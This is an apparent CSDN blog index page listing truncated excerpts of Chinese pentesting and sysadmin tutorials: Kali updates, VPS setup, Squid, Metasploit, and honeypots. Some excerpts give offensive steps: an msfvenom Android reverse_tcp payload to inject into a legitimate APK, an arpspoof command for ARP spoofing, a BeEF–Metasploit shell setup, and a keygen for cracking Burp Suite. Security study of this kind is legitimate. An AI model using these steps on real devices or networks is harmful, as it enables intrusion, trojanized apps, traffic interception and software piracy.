QQ:1519938366-优快云博客

原创 Kali Linux更新源和软件教程

vi /etc/apt/sources.list //kali更新源文件--添加更新源地址并保存--不使用的源地址可注释掉apt-get update //更新软件源中的软件列表apt-get upgrade //更新已经安装的软件包本身，不处理依赖关系改变的软件包apt-get dist-upgrade //更新完成后再次输入软件升级，处理依赖关系改变的软件包apt-get clean //更新完成后清除更新过程中下载并解压的安装包,因为包安装后就没有用了reboot //重启系统...

2021-04-01 04:47:35 1316

原创 VPS安装Linux系统_虚拟机方式

官网下载kali.iso镜像查看VPS厂商支持的镜像格式，//RAW格式｜QCOW2格式，VHD格式，VMDK格式VirtualBox创建虚拟机并记录存放虚拟机安装路径，创建对应的虚拟硬盘文件类型 //虚拟硬盘文件类型一般有VHD格式，VMDK格式设置好网络类型和选择导入kali.iso文件，安装完毕后记住用户名和密码并更新软件再开启ssh到虚拟机安装路径会多一个后缀为VHD硬盘文件来到VPS控制台，点击对象存储--存储桶列表--新建存储桶--上传VHD硬盘文件--上传成功后点击详情--复制对.

2021-04-01 03:54:01 974

原创 Burpsuite安装教程

1，BurpSuite需要java环境，https://blog.youkuaiyun.com/weixin_44212888/article/details/115315603?spm=1001.2014.3001.55012，打开burp-loader-keygen.jar注册机文件，点击run弹出一个窗口 //burp-loader-keygen.jar有三个栏，"License"，"Activation Request","Activation Response"3，管理员cmd到burp-loader.

2021-03-31 02:54:43 2363 2

原创 JDK环境变量配置

搜索引擎搜索对应"jdk"下载-安装java安装目录右键-属性-安全-编辑权限电脑--属--高级系统设置--高级--环境变量--新建系统变量名，变量值--添加到pathJAVA_HOME C:\Program Files\Java\jdk-11CLASSPATH .;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;path ;%JAVA_HOME%\bin;%JAVA_HOME%\jr.

2021-03-30 02:19:29 939

原创 Squid设置账号密码验证

vps服务器安全组开放端口规则yum install squid -yyum install httpd-tools -ycd /etc/squidhtpasswd -c /etc/squid/passwd 设置的账号，回车输密码后，会生成/etc/squid/passwd文件vi etc/squid/squid.confhttp_port 57000via offforwarded_for deleteauth_param basic program /usr/lib64/squi.

2021-03-28 02:27:03 1003 1

原创渗透测试思路总结（漏洞库）

渗透测试思路总结一、说明《Metasploit渗透测试魔鬼训练营》等书已经对渗透测试的步骤流程划分得比较合理透彻了，但感觉在多次通读该类书藉之后仍总感觉不得要领----要对一台给定的主机进行渗透还是不懂到底该如何着手。想来主要是存在以下两个问题。第一个是在渗透操作系统时，最为关键的从漏洞分析到渗透攻击这一步很难跨越。因为按书中漏洞分析基本只有openvas等漏洞扫描器一条途径，漏洞利用只有Metasploit搜索一条途径；而漏洞扫描器扫出漏洞Metasploit中又正好有利用模块更是少之又少。

2021-03-03 05:35:02 191

原创 metasploit常用命令

metasploit常用命令service apache2 startservice postgresql startmsfconsole启动1.MSF终端命令show exploit列出metasploit框架中的所有渗透攻击模块。show payloads列出metasploit框架中的所有攻击载荷。show auxiliary列出metasploit框架中的所有辅助攻击模块。search name查找metasploit框架中的所有渗透攻击和其他模块。

2021-03-03 01:49:49 659

原创 hfish 集群蜜罐搭建

一、前言 HFish是一款基于 Golang 开发的跨平台多功能主动攻击型蜜罐钓鱼平台框架系统，为了企业安全防护测试做出了精心的打造发布版本下载链接：https://github.com/hacklcx/HFish/releases Github: https://github.com/hacklcs/HFish多功能不仅仅支持 HTTP(S) 钓鱼，还支持支持 SSH、SFTP、Redis、Mysql、FTP、Telnet、暗网等蜜罐扩展性提供 API 接口，使...

2021-03-02 05:50:55 381

原创 beef +metasploit关联拿shell教程

参考了网络很多大神文章，简单小结一下，仅供参考手动关联 beef + msf1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true2,配置vim /usr/share/beef-xss/...

2021-03-01 06:19:54 790

原创 payload注入android APK教程

参考了网络很多大神文章，简单小结一下，仅供参考1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=监听端口号 -o virus.apk2,apktook反编译virus.apk和normal.apk3,找normal.apk入口，normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键词，定位到所对应的启动smail文件搜索Main和Launch关键词4,找到com/b.

2021-02-26 06:17:12 1596

原创 Metasploit基本用法

今天玩了一把内网渗透，其中主要用到了metasploit这款内网渗透神器。metasploit大家肯定不陌生，我也在很早之前就有接触过，但每次重新使用它时都会遗忘一些用法，因此为了方便查询我在本篇记录下metasploit神器的一些常用命令，以及内网渗透中如何使用它。Mac下安装metasploitmac下安装metasploit比较简单，官网下载pkg安装包，直接安装即可；需要注意的是安装完成后的路径。 msfconsole路径：/opt/metasploit-framework/bin

2021-02-25 06:37:52 480

原创 ARP欺骗&DNS劫持

ping ip //ping主机是否连通fping -aqg ip/掩码 nmap -sP 192.168.0.1/2 //获得主机列表，192.168.0.1/24”表示扫描"192.168.0.1-192.168.0.254"这个网段内所有的主机。route -n //查看网关ifconfig //查看网卡接口arpspoof -i eth0 -t 192.168.0.129 -r 192.168.0.2 //arp欺骗 -i 表示网卡接口，-t 表示目标地址，-r 表示网关...

2021-02-03 17:28:20 940

原创 IP地址，子网掩码，网段表示法，默认网关，DNS服务器详解

计算机网络: IP地址，子网掩码，网段表示法，默认网关，DNS服务器详解楔子：　　以Windows系统中IP地址设置界面为参考(如图1)， IP地址, 子网掩码, 默认网关和 DNS服务器, 这些都是什么意思呢？　　　　　　学习IP地址的相关知识时还会遇到网络地址,广播地址,子网等概念,这些又是什么意思呢？一 IP地址概述计算机要实现网络通信，就必须要有一个用于快速定位的网络地址。IP地址就是计算机在网络中的唯一身份ID，与...

2021-01-29 02:00:23 1658

原创 MSF后渗透测试

在对目标进行渗透测试的时候，通常情况下，我们首先获得的是一台web服务器的webshell或者反弹shell，如果权限比较低，则需要进行权限提升；后续需要对系统进行全面的分析，搞清楚系统的用途；如果目标处于一个内网环境中，那么我们就需要通过它对内网的其它终端进行信息收集和渗透测试，更全面地挖掘系统中存在的安全隐患。本期安仔课堂，ISEC实验室的向老师为大家介绍如何使用MSF进行后渗透测试。一、获取Meterpreter会话Meterpreter 是msf的一个payload，目标执行之后，我们会得到

2021-01-29 01:23:52 267

Johnathan的博客